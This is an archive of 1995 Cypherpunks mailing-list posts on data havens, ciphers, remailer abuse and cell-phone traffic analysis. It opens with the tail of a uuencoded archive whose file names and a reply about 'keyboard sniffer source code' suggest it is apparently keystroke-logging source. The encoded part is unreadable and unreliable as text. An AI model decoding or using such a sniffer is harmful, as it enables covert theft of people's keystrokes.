M3Y`I"3DF/Q/X6Q.U_3%/]C&6=R-@=-TI6LH4OQ#\^YUA1PISG"S@)^H-OKQ2
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
!````
`
end
sum -r/size 44244/29795 section (from "begin" to "end")
sum -r/size 20996/21601 entire input file



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Fri, 13 Jan 95 12:38:45 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: Keyboard sniffer source code
In-Reply-To: <0098A5EA.FA888140.1@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <9501132038.AA17540@toad.com>
MIME-Version: 1.0
Content-Type: text


> 
> Not to be paranoid, but did anybody receive that program?
> 
> Does cypherpunkcs@toad.com have a pgp key?
> 
> I think it was intercepted.
> 
> mike
> 
Yep, and I've already got a couple of other like it from other sources.
I also posted a semi-solution to the problem. If it doesn't show up,
let me know and I'll repost it.

PGP Key available on request, or try keyservers (ID = 0xab1f4831)

  Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Jan 95 12:47:29 PST
To: cypherpunks@toad.com
Subject: NYT on MS Online Latest
Message-ID: <199501132046.PAA07929@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Lewis writes today on latest MS Network online mighty joes, palming
Uunet for hi-speed hookup and Mosaic and Spyglass for joetoe-jam
web-peddling. 
 
See it by sending blank message with subject:  NEB_wet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Fri, 13 Jan 95 16:03:53 PST
To: cypherpunks@toad.com
Subject: FW: How do I know if its encrypted?
Message-ID: <9501140004.AA21059@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



----------
From:  <Ben.Goren@asu.edu>
To: Matt Thomlinson
Subject: Re: How do I know if its encrypted?
Date: Friday, January 13, 1995 12:27PM

At 9:35 AM 1/13/95, Matt Thomlinson wrote:
>make "handful of plaintext"  - > "hash of the plaintext" and you've got
>yourself
>a decent system. :)
>
>(this way, alice can keep a hash of the plaintext, hash of the ciphertext, and
>a key around for recovery, without keeping ANY plaintext. Also, for someone
>to request the data, knowing part of the message won't work; now they've
>got to know the entire message to recreate the hash.

That would be a little more secure, but I'm thinking that the "handful of
plaintext" would be a random number of some kind that the user prepends to
the file before encrypting. This is kinder on the data haven's CPU; compare
even 3DES of, say, 256 bits to IDEA of a few megabytes followed by MD5 of
same. Plus, it offers the operater even more deniability: he doesn't even
look at the whole file, but just enough to be sure that it's what it's
supposed to be.

Presumably, the data haven will specify how much a handful is, and offer a
client program that generates all this automatically.

>matt

You sent this to me privately, so that's how I'm replying. If you don't
mind, though, please forward this on to the list.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua M. Sled" <jsled@eis.calstate.edu>
Date: Fri, 13 Jan 95 16:23:28 PST
To: cypherpunks@toad.com
Subject: C'punks slogan?
Message-ID: <Pine.3.89.9501131615.A7216-0100000@eis.calstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mostly because I'm looking at having bumper stickers made, and partly 
because I'm testing a procmail script :), I want a few suggestions for a 
good slogan for the C'punks, something that would look good on a bumper 
sticker... stuff I've come up with so far is like:

sub rosa - Cypherpunks 1995
Support your local Cypherpunk
Privacy isn't a crime (I think I stole that from somewhere)
Ensuring privacy isn't a crime

And that's about it.... you should see by now why I'm asking. :)

Joshua M. Sled <jsled@ctp.org/jsled@free.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Thu, 12 Jan 95 21:46:02 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <9501122119.AA05796@doom.intuit.com>
Message-ID: <9501131633.ZM23442@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 12,  1:21pm, Mark Chen wrote:
> Among symmetric ciphers, there's GOST.

Using which S-boxes though?  Matt posted a set a while ago, although
I suspect they were the ones the Soviet public got, and probably not
overly secure.

Add the latest (91 I think) version LOKI to the list.  Only a 64 bit key, but
still not bad, reasonably well studied, and free.

							Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <Paul.Foley@vuw.ac.nz>
Date: Thu, 12 Jan 95 19:33:57 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.SUN.3.91.950111114155.10307B-100000@access3.digex.net>
Message-ID: <199501130333.QAA03633@akeake.its.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@access.digex.net> wrote:

>> This is EXACTLY what I was contemplating. I really wish they would
>> implement it. Then I can get the traveler's cheques out of my wallet.
>> (unsigned in both spots of, course.)
>
>Is this not essentially the same as the current pre-paid long distance
>Phone cards on the market?
>
>One would think the transition as easy for the credit card companies to
>make with a secured, disposable visa card.

NZ Telecom are conducting an experiment with using phonecards in
softdrink vending machines.  There was an article in The Dominion
newspaper's _InfoTech_ magazine crying out for the Government to stop
it, claiming Telecom's creating an independant (from the Reserve Bank)
currency, will destroy the New Zealand economy, etc., etc.

---
Paul Foley <Paul.Foley@vuw.ac.nz>    -----    PGP encrypted mail preferred

                 PGP key available from keyservers or finger
                    (finger pfoley@akeake.its.vuw.ac.nz)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 13 Jan 95 07:36:05 PST
To: cypherpunks@toad.com
Subject: Cellular and Crime
Message-ID: <Pine.HPP.3.91.950113155933.27354A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



There is this criminal trial going on in Stockholm concerning
a group of suspects that entered a bank vault through the roof
over a weekend in 1992. They have been prime suspects for a
long time but evidently it has taken a lot of time to build up
a case against them. Traffic analysis (but not tapping of the
actual conversations, GSM? - no mention of the system in the
news stories) plays a substantial role in the prosecution.
'A and B were at X at the same time','B and C were in the
vicinity of the Bank at this time' etc. The suspects have not
tried to argue that their cellulars were on loan to some stray
persons.

We all know that a booted cellular is a wonderful Area Locator.
(I wonder if the suspects new?) But I have (naively) been
thinking that the authorities needed prior suspicion using
this feature in 'real time'. Judging from what has been written
about this trial the police must have requested, and received,
logged traffic data quite some time afterwards.

Perhaps they log it for ever?

Mats    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Thu, 12 Jan 95 22:01:10 PST
To: cypherpunks@toad.com
Subject: Re: FBI and BLACKNET
In-Reply-To: <HeW5lKjqRyHD077yn@mirage.skypoint.com>
Message-ID: <9501131639.ZM23450@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 12, 11:05pm, Samuel Kaplin wrote:
> Fill out this form letter, get it notarized and send it to the address in
> the letterhead. Be prepared to wait and get jerked around. I have heard
> that some FOI requests have taken as long as two years to get back.

Although the FBI only have juristiction within the US, it is quite possible
that they would have files containing information about non-US nationals
if they were involved (perhaps even peripherally) in domestic FBI
investigations.

I wonder what would happen if a non-US citizen logged an FOI request?
Has anyone ever tried?

						Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Fri, 13 Jan 95 13:47:10 PST
To: cypherpunks@toad.com
Subject: retiring my remailer.. (fwd)
Message-ID: <199501132146.QAA13046@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From remailer-operators-owner@c2.org Tue Jan  3 10:21:42 1995
To: Remailer-Operators@c2.org
Message-Id: <199501031453.IAA02344@jpunix.com>
Subject: retiring my remailer..
Date: Tue, 03 Jan 1995 08:53:51 -0600
From: "John A. Perry" <perry@jpunix.com>

	The anonymous remailer at jpunix.com is going to shut down 
permanently shortly after I send this message. I spent my holidays 
fighting spams, running out of disk space because of spams and people 
sending HUGE binaries, and running out of swap space. 

	I have come to the ultimate conclusion that the Internet is not
mature or developed enough for remailers. The intended purpose has been
completely ignored while abuse is growing almost geometrically on a daily
basis. I have concluded that running a remailer on the Internet is like
giving a bunch of terrorists a nuclear bomb and then telling them "But
only use it for good!". There just doesn't seem to be much point in
thrashing my disks and computer to aid somebody in net abuse. I hardly
ever (never) see any use of the remailer for the purposes it was intended. 

BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 
30 seconds. The contents of the spam being passed thru my system 
essentially says:


          THIS IS A MAIL BOMB!!
          **** BOOM ***

See what I mean??

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.
 Finger remailer@jpunix.com for remailer help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Fri, 13 Jan 95 14:06:27 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <9501132200.AA00870@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Actually, a slight correction.  PGP does have an algorithm byte
> for the encryption algorithm; this byte is inside the RSA block.

It's got another algorithm byte - the stuff at the beginning that
says --- BEGIN PGP ENCRYPTED MESSAGE ---, letting everyone know
it's PGP.  That's one of the major risks of "algorithm bytes" -
not that it tells the Bad Guys which algorithm you're using,
but that it tells them "yes, this is crypto, not just noise".

		Bill		




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 13 Jan 95 14:33:00 PST
To: bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Subject: State of PGP dll?; Encrypted session projects
In-Reply-To: <9501132200.AA00870@anchor.ho.att.com>
Message-ID: <m0rSpv2-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


What is the state of the Windows/.dll PGP libraries?

Does anyone have a usable version yet?


I've been thinking of trying to wedge pgp/encrypted session ability
into some of the socket proxy programs out there.

For Windows: twnsck12.zip, which is simple, is GNU, and has source and
by writing a relatively simple windows serial terminal emulator and
using Comt ($15 or 25 shareware) to convert it to a telnet client.
Both of these could be modified fairly easily.

I think Twinsock (Troy's winsock, twnsck12.zip) would be the first
to work on, since it would cover whatever clients you would want to use.

It also should tunnel through multiple telnets since by default it escapes
just about everything.

Term would be a good Unix-Unix equivalent target.

Does anyone have better ideas?  Any suggestions on login/key
exchange sequence?

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant      510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 18:00:08 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <v02110104ab3c75c9a6c6@[129.219.97.131]>
Message-ID: <199501140158.RAA03820@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ben.Goren@asu.edu

   That of the data haven operator being able to deny knowledge of the
   contents of files people send him. He'll only return files that, when
   operated on by a strong cryptographic algorithm, make sense. 

This idea doesn't work for the purpose intended.  I'll upload straight
ASCII.  When you ask for an decryption key, I'll make one up randomly,
